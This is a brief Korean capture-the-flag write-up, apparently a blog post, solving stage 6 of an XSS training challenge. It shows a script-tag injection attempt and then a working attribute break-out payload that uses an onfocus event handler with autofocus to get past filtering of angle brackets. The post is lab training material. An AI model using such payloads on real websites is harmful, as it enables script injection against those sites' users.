Stage # 6
풀이
더보기
6번
"><script>alert(document.domain)</script> 를 입력해보았다.
<>가 필터링되어 XSS가 실행 되지않는다.
<>를 사용하지 않고 XSS를 실행 시켜야 한다.
event handler를 사용하면 할 수 있다.
" onfocus =alert(document.domain); autofocus
REF
portswigger.net/web-security/cross-site-scripting/cheat-sheet
'CTF > XSS Challenges' 카테고리의 다른 글
[XSS Challenges] Stage #8 (0) | 2020.11.19 |
---|---|
[XSS Challenges] Stage #7 (0) | 2020.11.19 |
[XSS Challenges] Stage #5 (0) | 2020.11.17 |
[XSS Challenges] Stage #4 (0) | 2020.11.17 |
[XSS Challenges] Stage #3 (0) | 2020.11.17 |